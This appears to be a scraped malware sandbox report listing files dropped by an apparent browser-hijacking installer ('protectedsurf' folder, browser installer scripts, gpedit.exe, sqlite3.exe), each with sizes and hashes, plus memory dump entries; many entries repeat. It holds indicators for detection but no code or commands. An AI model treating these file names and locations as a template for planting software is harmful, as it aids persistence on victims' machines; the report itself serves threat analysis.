e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsExec.dll
Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsExec.dll
Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsExec.dll
Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsExec.dll
Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsExec.dll
Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsExec.dll
Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsExec.dll
Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsExec.dll
Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsProcess.dll
Filesize
4KB

MD5
05450face243b3a7472407b999b03a72

SHA1
ffd88af2e338ae606c444390f7eaaf5f4aef2cd9

SHA256
95fe9d92512ff2318cc2520311ef9145b2cee01209ab0e1b6e45c7ce1d4d0e89

SHA512
f4cbe30166aff20a226a7150d93a876873ba699d80d7e9f46f32a9b4753fa7966c3113a3124340b39ca67a13205463a413e740e541e742903e3f89af5a53ad3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsProcess.dll
Filesize
4KB

MD5
05450face243b3a7472407b999b03a72

SHA1
ffd88af2e338ae606c444390f7eaaf5f4aef2cd9

SHA256
95fe9d92512ff2318cc2520311ef9145b2cee01209ab0e1b6e45c7ce1d4d0e89

SHA512
f4cbe30166aff20a226a7150d93a876873ba699d80d7e9f46f32a9b4753fa7966c3113a3124340b39ca67a13205463a413e740e541e742903e3f89af5a53ad3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\nsProcess2.dll
Filesize
35KB

MD5
6e96ea8b0dfdb326c0852a5b64d920a6

SHA1
5ea182cb6ae5c104ca064fa8464df8ed1904eaa7

SHA256
b8762c09c2b45fc836c65a9052951de05177651d278e4cf154c754d9f5573e7a

SHA512
02d0bd8f16ddad829b80764926f1e6dcfb35b60fbce02bec0a7fc2011164d86f633074af012de71fae33b90732ec4c7633f8a70ab24c19717926757f9c56fb4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\ping.js
Filesize
541B

MD5
1d6e3a358460c1398aa1e560ee15cde8

SHA1
32044b503fb2b13c78f6e46b1b30b2b9cb125a86

SHA256
32b4c5a71ababac7ee683d88694a07c39bcb391a01fc1daeb7fa283768c6527c

SHA512
55866db4dbeba4be3ad3f245a4b390275467b603dbb7c383b41d0a71850904634b874cc7a2e5313b1f60674db8ee41db7620e03e5b3b406d1fe1ddc1b675a8eb

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\SoftwareDetector.exe
Filesize
120KB

MD5
791a36c814a825fdfe596e5e7eea27b7

SHA1
10ac78b8899a727bb3bdf924312a940b8ba0bac1

SHA256
0186d765b4dc4132c243b20214c6fb1de49e645fc1b5acddbe954d6e5682f84f

SHA512
bd13f3c19905b5a6062614267f20d054141926c3c6837e1583de6b821f310de7d48da79164a8c3c9ccb8a3a46e76292554faca4a2384cfe0a045c597a9ea3a86

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\SoftwareDetector.exe
Filesize
120KB

MD5
791a36c814a825fdfe596e5e7eea27b7

SHA1
10ac78b8899a727bb3bdf924312a940b8ba0bac1

SHA256
0186d765b4dc4132c243b20214c6fb1de49e645fc1b5acddbe954d6e5682f84f

SHA512
bd13f3c19905b5a6062614267f20d054141926c3c6837e1583de6b821f310de7d48da79164a8c3c9ccb8a3a46e76292554faca4a2384cfe0a045c597a9ea3a86

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\SoftwareDetector.exe
Filesize
120KB

MD5
791a36c814a825fdfe596e5e7eea27b7

SHA1
10ac78b8899a727bb3bdf924312a940b8ba0bac1

SHA256
0186d765b4dc4132c243b20214c6fb1de49e645fc1b5acddbe954d6e5682f84f

SHA512
bd13f3c19905b5a6062614267f20d054141926c3c6837e1583de6b821f310de7d48da79164a8c3c9ccb8a3a46e76292554faca4a2384cfe0a045c597a9ea3a86

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\SoftwareDetector.exe
Filesize
120KB

MD5
791a36c814a825fdfe596e5e7eea27b7

SHA1
10ac78b8899a727bb3bdf924312a940b8ba0bac1

SHA256
0186d765b4dc4132c243b20214c6fb1de49e645fc1b5acddbe954d6e5682f84f

SHA512
bd13f3c19905b5a6062614267f20d054141926c3c6837e1583de6b821f310de7d48da79164a8c3c9ccb8a3a46e76292554faca4a2384cfe0a045c597a9ea3a86

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\chrome_gp_update.js
Filesize
2KB

MD5
c15a7afa4a3ed3464df40e6eb840cc73

SHA1
51807d6d3f2567de9c4716b32f91ecc8839cc117

SHA256
41fe7e7445819a935215fd0928f5bb1bb3a2e3df36f0c27111c99cb716064f18

SHA512
90c7a06ceafc6cc7ab35254b3f394702d10881f363527b8fe2e2c6b3fec391141333fe7153a5cae83a6f8889fd55e7a478f1d979497d557fabcb4bcff9cc7ae7

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\chrome_installer.js
Filesize
6KB

MD5
b84e6bbca06fb8a9489da545c7eefa57

SHA1
76035835e1777bfff7d86e7d056392d7bd37e3a7

SHA256
aa681b9306c2c020e2164660e266c7298b31fc8b21c1b3abd5151358047ecb1f

SHA512
a560f81cdb76ac68f4e056df85789b8576e3f66b408f7a0da1c68f4efe46b63ca17734de20dd476386aa4a9e9122db7800ca8a19475d1d52f121c76db3a89dc4

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\common.js
Filesize
13KB

MD5
b2138aac6406d0c00245703bba442164

SHA1
269be35d6d0c909dfd08950134d7d8d9261c057c

SHA256
bb03ad0805409eced066c7c3dac7696761ffcc69a73f21d2ed0b8e13ed731f76

SHA512
f450fc962f12d9a9141a01ee7ce93f539909df89b2af01b31c74996f83659ce475c096265633e9f0193cb8e7cc816f042bfab3d5c781d0cc1d24e0df8ebb6c51

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\firefox\extension_info.json
Filesize
1KB

MD5
76597b4b2ababd04c7e557b22982a7b4

SHA1
72a68c71c7d35f6d843b2e5d2a5a188190c9399f

SHA256
fb1b1618893894eeda8c0eb3f570f538027121940bd8595e4d501707a95cd78e

SHA512
85a082252c02cfe87228124da7d2cd218dd2cdc58a0d602d5d4001d2ed6820edf367f5b25fba2c74d52ee3d9d0816eff972fd503a99002ebcb1140d0c05549d2

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\firefox_installer.js
Filesize
6KB

MD5
6e8d14076e1b88eb8e5f1be916807a9b

SHA1
d99d91a0ec88d8d3ff20c983607ae0df539a3200

SHA256
c03190cd1fe25cd564fe69ef0c9b4ab1cf4d2fc51118aac60389f68f73953b27

SHA512
76b47fba913aa7b5b281584a5145b43a426a54e7ca49ade7682db0171bed67288cb748d6e88d8c8043484c9adfad6a86253d1252fe5e361bba835940f33b59a5

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\gpedit.exe
Filesize
91KB

MD5
47a3a3fe7cdde150add526bbcd8d571c

SHA1
48334e741ecc51cd8715cd12a511eafe4bf5b24b

SHA256
4e7f9b09f3eae4088f8cbd4cbc29a03125906775e2724683ae841fe0d71e892e

SHA512
6a7efa47735a658f114f981b0f65ea903bd8cf85a1d85d66b8fbba0d63c57a612dd16ae2ede9d15f21d0f93940d3da409852d76cf4d0577574f59dcb36911b21

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\gpedit.exe
Filesize
91KB

MD5
47a3a3fe7cdde150add526bbcd8d571c

SHA1
48334e741ecc51cd8715cd12a511eafe4bf5b24b

SHA256
4e7f9b09f3eae4088f8cbd4cbc29a03125906775e2724683ae841fe0d71e892e

SHA512
6a7efa47735a658f114f981b0f65ea903bd8cf85a1d85d66b8fbba0d63c57a612dd16ae2ede9d15f21d0f93940d3da409852d76cf4d0577574f59dcb36911b21

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\ie_installer.js
Filesize
3KB

MD5
3de39b38af916bcf07f7a68c5b065ffe

SHA1
5a9dd39ca54f4fc76f805879669b25c5ad29d213

SHA256
1bba4e6523b1a0581c008b6d7b348260a2f9f61a22daf445ed6ffa37c970c2b8

SHA512
893c2e487a37366fea9ba8e8a61064af5c63ae5937a026ba3565872758caa6653125abcea74d84f6c2ee95c23fce030f403159c6fde6616c0ed7f1af28e0a479

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\installer.js
Filesize
799B

MD5
1d2e2b33ed23d2687ac7551613e3ce10

SHA1
738fdf284c336d88f8fc178371aa073a75ac4f0f

SHA256
e6bc0ed8424b80085a08df410ad0d43ba37b052ccadfb6450a2337f37ca1288f

SHA512
af221b4bcb6e00015aced99bd47db97ad994441ee5f251106686a6da05d98289a6783a5c0ccd8e50b76216b53f1d4ab3cfda6c7fc8108b4e2f56f512cb4e7393

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\main_installer.js
Filesize
1KB

MD5
4ca1909eb243f179f48935c8106fdbc9

SHA1
cbc20846bb8b96fcf3b3bbb9d80709c8024a8366

SHA256
7acaec9a466eb71fc663f6c6c3bc41ec080f544b4e864cd1e5d6d3cd06230232

SHA512
66cc6deee36443539e6fa66ec7ef7ca0932b9b9a085296648a4448628ae21efd53a56cd592f242c5f17e88d7924b1510af1d49da220a6980aa1d004deae199a8

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\migrate.js
Filesize
4KB

MD5
7c936cb5190fc3ad0b581a562875e9a4

SHA1
ec727ee61e1598bafaf0085817151cc3a9d741c4

SHA256
9770fd38208bf2b6e1676f833a90f0f5129bae080fd890614d719b43c290c167

SHA512
987e4093e606d2ada424c3681f21a23cd8d4135a995c1286407aef3c1dcdbecec42be30961c9bb2fe92ac5a9ee5eb2715fc9c12192e6a328295f7dad28cbc341

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\projectInstaller.js
Filesize
2KB

MD5
2d4d6d3c8aea670a0742f1dbfb2928d2

SHA1
f6e3fa626bd3d65e439f534ea215e477ae33f66c

SHA256
02ca4af05e5620f2bc7bd253cf002259dbf3908a8dabb941496c35b790444967

SHA512
130969c86ecdd1dd9fa7bf88c15a526262992d93c40207e334f4774163789e3605851477480f15012b04dc678b4daa299104d63a495017a947af709fd2cb34cc

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\sqlite3.exe
Filesize
481KB

MD5
82771129b12517cf5c6e2244d14e8360

SHA1
4e2a55e517f0e1324d3e8840e7db41f3883e4a01

SHA256
3441036aa8be132d8476bbee2648e966db130e3fdba1eb97c9972d55248bf9bc

SHA512
862028b3ae8bf3ae8e218326a5df634b19d816bcd86b830675214713e543d7672cead28e3178ef23081d508501630e4ef622066f123681c3c6d98d19e6e20c46

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\sqlite3.exe
Filesize
481KB

MD5
82771129b12517cf5c6e2244d14e8360

SHA1
4e2a55e517f0e1324d3e8840e7db41f3883e4a01

SHA256
3441036aa8be132d8476bbee2648e966db130e3fdba1eb97c9972d55248bf9bc

SHA512
862028b3ae8bf3ae8e218326a5df634b19d816bcd86b830675214713e543d7672cead28e3178ef23081d508501630e4ef622066f123681c3c6d98d19e6e20c46

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\sqlite3.exe
Filesize
481KB

MD5
82771129b12517cf5c6e2244d14e8360

SHA1
4e2a55e517f0e1324d3e8840e7db41f3883e4a01

SHA256
3441036aa8be132d8476bbee2648e966db130e3fdba1eb97c9972d55248bf9bc

SHA512
862028b3ae8bf3ae8e218326a5df634b19d816bcd86b830675214713e543d7672cead28e3178ef23081d508501630e4ef622066f123681c3c6d98d19e6e20c46

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\storageedit.exe
Filesize
73KB

MD5
ce8dcc1beadec52dd545174b12ac0b0b

SHA1
e6518a880c5f3561340310f468a8fc3ae379c2de

SHA256
3a2ecbde1415deaf9ea6786e0739d1392807a36f29d838824957aabbeffb407d

SHA512
73a08b869cdf0d01650756ba6083308f82a940325e6ef9b20358f68b489edf21f7720e15e874be4d2aed071be7c7b2e4c5a1a87bbfe4048da0c2a87697540ad8

Download Submit
C:\Users\Admin\AppData\Local\protectedsurf\storageedit.exe
Filesize
73KB

MD5
ce8dcc1beadec52dd545174b12ac0b0b

SHA1
e6518a880c5f3561340310f468a8fc3ae379c2de

SHA256
3a2ecbde1415deaf9ea6786e0739d1392807a36f29d838824957aabbeffb407d

SHA512
73a08b869cdf0d01650756ba6083308f82a940325e6ef9b20358f68b489edf21f7720e15e874be4d2aed071be7c7b2e4c5a1a87bbfe4048da0c2a87697540ad8

Download Submit
memory/224-170-0x0000000000000000-mapping.dmp

Download
memory/316-239-0x0000000000000000-mapping.dmp

Download
memory/516-237-0x0000000000000000-mapping.dmp

Download
memory/516-159-0x0000000000000000-mapping.dmp

Download
memory/744-233-0x0000000000000000-mapping.dmp

Download
memory/1152-190-0x0000000000000000-mapping.dmp

Download
memory/1228-197-0x0000000000000000-mapping.dmp

Download
memory/1412-152-0x0000000000000000-mapping.dmp

Download
memory/1480-231-0x0000000000000000-mapping.dmp

Download
memory/1632-230-0x0000000000000000-mapping.dmp

Download
memory/1652-207-0x0000000000000000-mapping.dmp

Download
memory/1708-214-0x0000000000000000-mapping.dmp

Download
memory/1744-241-0x0000000000000000-mapping.dmp

Download
memory/1752-229-0x0000000000000000-mapping.dmp

Download
memory/1836-228-0x0000000000000000-mapping.dmp

Download
memory/1844-240-0x0000000000000000-mapping.dmp

Download
memory/1960-141-0x0000000000000000-mapping.dmp

Download
memory/1968-227-0x0000000000000000-mapping.dmp

Download
memory/2052-226-0x0000000000000000-mapping.dmp

Download
memory/2276-186-0x0000000000000000-mapping.dmp

Download
memory/2288-174-0x0000000003020000-0x0000000003029000-memory.dmp

Filesize
36KB

Download
memory/2288-140-0x0000000003020000-0x0000000003029000-memory.dmp

Filesize
36KB

Download
memory/2288-172-0x0000000003020000-0x0000000003029000-memory.dmp

Filesize
36KB

Download
memory/2288-173-0x0000000003020000-0x0000000003029000-memory.dmp

Filesize
36KB

Download
memory/2288-175-0x0000000003020000-0x0000000003029000-memory.dmp

Filesize
36KB

Download
memory/2288-243-0x0000000003020000-0x0000000003025000-memory.dmp

Filesize
20KB

Download
memory/2288-139-0x0000000003020000-0x0000000003029000-memory.dmp

Filesize
36KB

Download
memory/2308-171-0x0000000000000000-mapping.dmp

Download
memory/2764-217-0x0000000000000000-mapping.dmp

Download
memory/2936-199-0x0000000000000000-mapping.dmp

Download
memory/3600-238-0x0000000000000000-mapping.dmp

Download
memory/3700-179-0x0000000000000000-mapping.dmp

Download
memory/3708-182-0x0000000000000000-mapping.dmp

Download
memory/3852-176-0x0000000000000000-mapping.dmp

Download
memory/4240-162-0x0000000000000000-mapping.dmp

Download
memory/4316-222-0x0000000000000000-mapping.dmp

Download
memory/4332-236-0x0000000000000000-mapping.dmp

Download
memory/4400-202-0x0000000000000000-mapping.dmp

Download
memory/4412-209-0x0000000000000000-mapping.dmp

Download
memory/4420-242-0x0000000000000000-mapping.dmp

Download
memory/4440-193-0x0000000000000000-mapping.dmp

Download
memory/4524-184-0x0000000000000000-mapping.dmp

Download
memory/4660-165-0x0000000000000000-mapping.dmp

Download
memory/4708-232-0x0000000000000000-mapping.dmp

Download
memory/4876-235-0x0000000000000000-mapping.dmp

Download
memory/4920-148-0x0000000000000000-mapping.dmp

Download
memory/5032-225-0x0000000000000000-mapping.dmp

Download
memory/5048-234-0x0000000000000000-mapping.dmp

Download